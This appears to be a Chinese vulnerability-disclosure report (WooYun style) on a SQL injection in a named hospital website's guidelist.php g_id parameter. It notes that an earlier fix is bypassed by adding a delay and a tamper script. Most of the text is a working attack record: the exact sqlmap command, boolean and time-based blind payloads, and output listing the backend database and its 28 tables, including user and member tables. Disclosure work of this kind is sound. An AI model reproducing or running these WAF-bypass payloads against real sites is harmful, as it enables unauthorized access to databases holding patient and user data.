URL:http://life.ufh.com.cn/guidelist.php?g_id=10
之前提过一个 和睦家回复说已修复此漏洞
厂商回复:
医院官方主页,篡改后会对影响医院声誉
最新状态:
2015-12-21:供应商已修复此漏洞
WooYun: 和睦家医院某站sql注入
测试发现,应该就是加了个软waf 加个延时可以继续注入
C:\Python27\SqlMap>Sqlmap.py -u http://life.ufh.com.cn/guidelist.php?g_id=10 --t
ime-sec=20 --tamper=space2comment
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: g_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: g_id=10 AND 8003=8003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: g_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: g_id=10 AND 8003=8003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)
---
back-end DBMS: MySQL 5.0.12
current database: 'life_wp'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: g_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: g_id=10 AND 8003=8003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)
---
back-end DBMS: MySQL 5.0.12
Database: life_wp
[28 tables]
+-----------------------+
| wp_activity |
| wp_apphos |
| wp_apply |
| wp_channel |
| wp_commentmeta |
| wp_comments |
| wp_forgetpwd |
| wp_guide |
| wp_home |
| wp_hospital |
| wp_links |
| wp_member |
| wp_options |
| wp_order |
| wp_pack |
| wp_pactivity |
| wp_personnel |
| wp_postmeta |
| wp_posts |
| wp_prize |
| wp_sign |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
| wp_wechat |
| wp_winning |
+-----------------------+
RT
过滤啊
